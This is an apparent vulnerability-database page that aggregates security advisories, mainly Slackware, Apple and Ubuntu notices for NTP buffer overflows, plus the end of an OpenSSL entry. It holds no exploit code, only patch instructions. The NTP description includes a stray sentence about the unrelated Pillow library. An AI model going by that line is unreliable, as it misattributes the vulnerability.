"https://access.redhat.com/errata/rhsa-2012:0109" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/cve-search/git-vuln-finder" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2110" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0884" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2131" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0036" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0057" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4078" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0031" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4885" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4317" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2014" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0830" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4153" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1823" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2013" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0021" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0053" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2012" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3379" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4577" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4576" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0027" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4619" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0050" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201203-12.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4109" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4108" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0059.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-4108.html" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8g-4ubuntu3.15" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1357-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1945" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-1ubuntu4.6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4354" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8o-5ubuntu1.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.8" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.0e-2ubuntu4.2" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0109.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0029" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0029.html" }, { "trust": 0.1, "url": "http://docs.redhat.com/docs/en-us/red_hat_enterprise_virtualization/3.0/html/technical_notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "http://www.isg.rhul.ac.uk/~kp/dtls.pdf" }, { "trust": 0.1, "url": "https://www.isg.rhul.ac.uk)" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4577" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "114105" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "CNNVD", "id": "CNNVD-201201-060" }, { "db": "NVD", "id": "CVE-2011-4577" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4577" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "114105" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "PACKETSTORM", "id": "169679" }, { "db": "CNNVD", "id": "CNNVD-201201-060" }, { "db": "NVD", "id": "CVE-2011-4577" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-03-18T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2012-01-06T00:00:00", "db": "VULMON", "id": "CVE-2011-4577" }, { "date": "2012-01-05T00:00:00", "db": "BID", "id": "51281" }, { "date": "2012-06-23T01:42:26", "db": "PACKETSTORM", "id": "114105" }, { "date": "2012-06-28T03:39:12", "db": "PACKETSTORM", "id": "114272" }, { "date": "2012-03-06T23:57:33", "db": "PACKETSTORM", "id": "110482" }, { "date": "2012-01-24T23:58:58", "db": "PACKETSTORM", "id": "109053" }, { "date": "2012-02-10T07:44:13", "db": "PACKETSTORM", "id": "109614" }, { "date": "2012-02-15T22:44:29", "db": "PACKETSTORM", "id": "109788" }, { "date": "2012-01-25T16:35:29", "db": "PACKETSTORM", "id": "109073" }, { "date": "2012-01-04T12:12:12", "db": "PACKETSTORM", "id": "169679" }, { "date": "2012-01-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201201-060" }, { "date": "2012-01-06T01:55:00.957000", "db": "NVD", "id": "CVE-2011-4577" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-05-02T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2014-03-26T00:00:00", "db": "VULMON", "id": "CVE-2011-4577" }, { "date": "2015-04-13T21:31:00", "db": "BID", "id": "51281" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201201-060" }, { "date": "2014-03-26T04:25:16.987000", "db": "NVD", "id": "CVE-2011-4577" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "CNNVD", "id": "CNNVD-201201-060" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL", "sources": [ { "db": "CERT/CC", "id": "VU#737740" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201201-060" } ], "trust": 0.6 } }
var-201703-1146
Vulnerability from variot
Multiple buffer overflows in the ctl_put* functions in NTP before 4.2.8p10 and 4.3.x before 4.3.94 allow remote authenticated users to have unspecified impact via a long variable. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. NTP (Network Time Protocol, Network Time Protocol) is a protocol for synchronizing computer clocks over a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2017-112-02)
New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix security issues.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p10-i586-1_slack14.2.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes security issues of medium and low severity: Denial of Service via Malformed Config (Medium) Authenticated DoS via Malicious Config Option (Medium) Potential Overflows in ctl_put() functions (Medium) Buffer Overflow in ntpq when fetching reslist from a malicious ntpd (Medium) 0rigin DoS (Medium) Buffer Overflow in DPTS Clock (Low) Improper use of snprintf() in mx4200_send() (Low) The following issues do not apply to Linux systems: Privileged execution of User Library code (WINDOWS PPSAPI ONLY) (Low) Stack Buffer Overflow from Command Line (WINDOWS installer ONLY) (Low) Data Structure terminated insufficiently (WINDOWS installer ONLY) (Low) For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6464 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6463 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6458 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6460 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9042 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6462 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6451 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6455 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6452 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6459 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p10-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p10-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p10-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p10-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p10-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p10-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p10-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p10-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p10-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p10-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p10-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p10-x86_64-1_slack14.2.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p10-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p10-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: e3e18355dbb881f31030c325d396691f ntp-4.2.8p10-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 7ca81f398c6f3fc306cf5e0ce4821ff7 ntp-4.2.8p10-x86_64-1_slack13.0.txz
Slackware 13.1 package: bb14e63e0ea28856fb14816848fad378 ntp-4.2.8p10-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 77bee4e0b7d7bae54c431210ba7b20f8 ntp-4.2.8p10-x86_64-1_slack13.1.txz
Slackware 13.37 package: 4424d362ec1dcb75d35560cc25f291b8 ntp-4.2.8p10-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 94bea621e2bad59b80553a9516c4ddb6 ntp-4.2.8p10-x86_64-1_slack13.37.txz
Slackware 14.0 package: b9edb40c9e94a8248b57f96a0f7d0f49 ntp-4.2.8p10-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: d8a52549c46ca33833f68d7b063ab1f2 ntp-4.2.8p10-x86_64-1_slack14.0.txz
Slackware 14.1 package: b36dd3b339aff2718dbd541a9f44b0a4 ntp-4.2.8p10-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: b55bc11c2aa8d0378005af5dbb105119 ntp-4.2.8p10-x86_64-1_slack14.1.txz
Slackware 14.2 package: 1e625a8f4732aa776992210eaac05f04 ntp-4.2.8p10-i586-1_slack14.2.txz
Slackware x86_64 14.2 package: 22f25f35765d0cb3ece21e5db79091cd ntp-4.2.8p10-x86_64-1_slack14.2.txz
Slackware -current package: 78de6454532d6c7d52242eadab528d64 n/ntp-4.2.8p10-i586-1.txz
Slackware x86_64 -current package: 0522a4270909826999d07567e9a9de56 n/ntp-4.2.8p10-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p10-i586-1_slack14.2.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
NOTE: On Slackware -current, first install the new etc package, and then be sure to move the .new config files and rc.ntpd script into place before restarting!
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAlj7hzYACgkQakRjwEAQIjNVhACdF5bLXhg1/7iHS02DHm90m59w Iv8AnR5vpRBWUQDw3267R3QPXEkAnI3f =0ZW2 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2017-09-25-1 macOS High Sierra 10.13
macOS High Sierra 10.13 is now available and addresses the following:
Application Firewall Available for: OS X Lion v10.8 and later Impact: A previously denied application firewall setting may take effect after upgrading Description: An upgrade issue existed in the handling of firewall settings. This issue was addressed through improved handling of firewall settings during upgrades. CVE-2017-7084: an anonymous researcher
AppSandbox Available for: OS X Lion v10.8 and later Impact: An application may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-2017-7074: Daniel Jalkut of Red Sweater Software
Captive Network Assistant Available for: OS X Lion v10.8 and later Impact: A local user may unknowingly send a password unencrypted over the network Description: The security state of the captive portal browser was not obvious. This issue was addressed with improved visibility of the captive portal browser security state. CVE-2017-7143: an anonymous researcher
CFNetwork Proxies Available for: OS X Lion v10.8 and later Impact: An attacker in a privileged network position may be able to cause a denial of service Description: Multiple denial of service issues were addressed through improved memory handling. CVE-2017-7083: Abhinav Bansal of Zscaler Inc.
CoreAudio Available for: OS X Lion v10.8 and later Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed by updating to Opus version 1.1.4. CVE-2017-0381: V.E.O (@VYSEa) of Mobile Threat Research Team, Trend Micro
Directory Utility Available for: OS X Lion v10.8 and later Impact: A local attacker may be able to determine the Apple ID of the owner of the computer Description: A permissions issue existed in the handling of the Apple ID. This issue was addressed with improved access controls. CVE-2017-7138: an anonymous researcher
file Available for: OS X Lion v10.8 and later Impact: Multiple issues in file Description: Multiple issues were addressed by updating to version 5.30. CVE-2017-7121: found by OSS-Fuzz CVE-2017-7122: found by OSS-Fuzz CVE-2017-7123: found by OSS-Fuzz CVE-2017-7124: found by OSS-Fuzz CVE-2017-7125: found by OSS-Fuzz CVE-2017-7126: found by OSS-Fuzz
Heimdal Available for: OS X Lion v10.8 and later Impact: An attacker in a privileged network position may be able to impersonate a service Description: A validation issue existed in the handling of the KDC- REP service name. This issue was addressed through improved validation. CVE-2017-11103: Jeffrey Altman, Viktor Duchovni, and Nico Williams
IOFireWireFamily Available for: OS X Lion v10.8 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7077: Brandon Azad
IOFireWireFamily Available for: OS X Lion v10.8 and later Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2017-7119: Xiaolong Bai, Min (Spark) Zheng of Alibaba Inc., Benjamin Gnahm (@mitp0sh) of PDX
Kernel Available for: OS X Lion v10.8 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7114: Alex Plaskett of MWR InfoSecurity
libc Available for: OS X Lion v10.8 and later Impact: A remote attacker may be able to cause a denial-of-service Description: A resource exhaustion issue in glob() was addressed through an improved algorithm. CVE-2017-7086: Russ Cox of Google
libc Available for: OS X Lion v10.8 and later Impact: An application may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2017-1000373
libexpat Available for: OS X Lion v10.8 and later Impact: Multiple issues in expat Description: Multiple issues were addressed by updating to version 2.2.1 CVE-2016-9063 CVE-2017-9233
Mail Available for: OS X Lion v10.8 and later Impact: The sender of an email may be able to determine the IP address of the recipient Description: Turning off "Load remote content in messages" did not apply to all mailboxes. This issue was addressed with improved setting propagation. CVE-2017-7141: an anonymous researcher
Mail Drafts Available for: OS X Lion v10.8 and later Impact: An attacker with a privileged network position may be able to intercept mail contents Description: An encryption issue existed in the handling of mail drafts. This issue was addressed with improved handling of mail drafts meant to be sent encrypted. CVE-2017-7078: an anonymous researcher, an anonymous researcher, an anonymous researcher
ntp Available for: OS X Lion v10.8 and later Impact: Multiple issues in ntp Description: Multiple issues were addressed by updating to version 4.2.8p10 CVE-2017-6451: Cure53 CVE-2017-6452: Cure53 CVE-2017-6455: Cure53 CVE-2017-6458: Cure53 CVE-2017-6459: Cure53 CVE-2017-6460: Cure53 CVE-2017-6462: Cure53 CVE-2017-6463: Cure53 CVE-2017-6464: Cure53 CVE-2016-9042: Matthew Van Gundy of Cisco
Screen Lock Available for: OS X Lion v10.8 and later Impact: Application Firewall prompts may appear over Login Window Description: A window management issue was addressed through improved state management. CVE-2017-7082: Tim Kingman
Security Available for: OS X Lion v10.8 and later Impact: A revoked certificate may be trusted Description: A certificate validation issue existed in the handling of revocation data. This issue was addressed through improved validation. CVE-2017-7080: Sven Driemecker of adesso mobile solutions gmbh, Rune Darrud (@theflyingcorpse) of BA|rum kommune, an anonymous researcher, an anonymous researcher
SQLite Available for: OS X Lion v10.8 and later Impact: Multiple issues in SQLite Description: Multiple issues were addressed by updating to version 3.19.3. CVE-2017-10989: found by OSS-Fuzz CVE-2017-7128: found by OSS-Fuzz CVE-2017-7129: found by OSS-Fuzz CVE-2017-7130: found by OSS-Fuzz
SQLite Available for: OS X Lion v10.8 and later Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7127: an anonymous researcher
WebKit Available for: OS X Lion v10.8 and later Impact: A malicious website may be able to track users in Safari private browsing mode Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions. CVE-2017-7144: an anonymous researcher
zlib Available for: OS X Lion v10.8 and later Impact: Multiple issues in zlib Description: Multiple issues were addressed by updating to version 1.2.11. CVE-2016-9840 CVE-2016-9841 CVE-2016-9842 CVE-2016-9843
Additional recognition
Security We would like to acknowledge Abhinav Bansal of Zscaler, Inc. for their assistance.
Installation note:
macOS 10.13 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJZyUQfAAoJEIOj74w0bLRGmSEP/0wgqASRSNneoBx/AMLk0Qac mZhI8HuyJRTFwCOT7P7vkZTmoxtyOOdh4XaInvKMsW5I2G64YEmW86pcofHwdOTz TSWIAdus34xErUZ13rMzfg8Z3XAberG1E31QU2y2EXenpJSZIL8nzLgt8ySPVyzu PrQJxGxCMq1WAOSemGe+4rK2rMwpw5UDZyTbNPDi6lfKz0ZmtfvBzrgBq2xhA9iF /2NVs5rRog38N6F6xR6GNqi0dVoZmh1umQINh9nzTn8crbSuI3ixRtQYxstxU91/ 0wrgV03YF297n6bwVhawEDPU8obZzFgQRiKOjghE6h4YBVccWxMI9n42PwVc+G/Z X48wuSavpOEV6WEC+hWtALl/W73uH3jF2iK8rPBcDENheRlFi/y5+XeOK8TGJftS 6raj+IgbgERaY3uXcRoi0mLflpzxvGBYlTiJRRj7H7HFZO6v14hYyEMVrWmhFUiZ Xgy/qxHdWd/NW4AZz8Ke+ZMaJr21DozzI8ejug9shD7O/N31ZNq2qsNmxEweCPvt yMauTPAUutApHTEUXfwCdOy+ZGgTtWDnOC+g3ezkAOdigvjFcwlFH0Sbjxnhxbbp LVLz7tHwyKa5Xcwet0ZRH3WCHBsTzzkpsgxoyEMabE2KGS461uZw20t2uZozNsV0 bniy26PJZ5xGrFOSZYUa =wBKW -----END PGP SIGNATURE-----
. ========================================================================== Ubuntu Security Notice USN-3349-1 July 05, 2017
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 17.04
- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in NTP.
Software Description: - ntp: Network Time Protocol daemon and utility programs
Details:
Yihan Lian discovered that NTP incorrectly handled certain large request data values. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. (CVE-2016-2519)
Miroslav Lichvar discovered that NTP incorrectly handled certain spoofed addresses when performing rate limiting. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7426)
Matthew Van Gundy discovered that NTP incorrectly handled certain crafted broadcast mode packets. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428)
Miroslav Lichvar discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7429)
Sharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly handled origin timestamps of zero. A remote attacker could possibly use this issue to bypass the origin timestamp protection mechanism. This issue only affected Ubuntu 16.10. (CVE-2016-7431)
Brian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly performed initial sync calculations. This issue only applied to Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7433)
Magnus Stubman discovered that NTP incorrectly handled certain mrulist queries. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7434)
Matthew Van Gund discovered that NTP incorrectly handled origin timestamp checks. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu Ubuntu 16.10, and Ubuntu 17.04. (CVE-2016-9042)
Matthew Van Gundy discovered that NTP incorrectly handled certain control mode packets. A remote attacker could use this issue to set or unset traps. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9310)
Matthew Van Gundy discovered that NTP incorrectly handled the trap service. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9311)
It was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6458)
It was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only applied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. (CVE-2017-6460)
It was discovered that the NTP legacy DPTS refclock driver incorrectly handled the /dev/datum device. A local attacker could possibly use this issue to cause a denial of service. (CVE-2017-6462)
It was discovered that NTP incorrectly handled certain invalid settings in a :config directive. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)
It was discovered that NTP incorrectly handled certain invalid mode configuration directives. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6464)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 17.04: ntp 1:4.2.8p9+dfsg-2ubuntu1.1
Ubuntu 16.10: ntp 1:4.2.8p8+dfsg-1ubuntu2.1
Ubuntu 16.04 LTS: ntp 1:4.2.8p4+dfsg-3ubuntu5.5
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.11
In general, a standard system update will make all the necessary changes.
References: https://www.ubuntu.com/usn/usn-3349-1 CVE-2016-2519, CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7429, CVE-2016-7431, CVE-2016-7433, CVE-2016-7434, CVE-2016-9042, CVE-2016-9310, CVE-2016-9311, CVE-2017-6458, CVE-2017-6460, CVE-2017-6462, CVE-2017-6463, CVE-2017-6464
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p9+dfsg-2ubuntu1.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p8+dfsg-1ubuntu2.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.5 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.11
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": 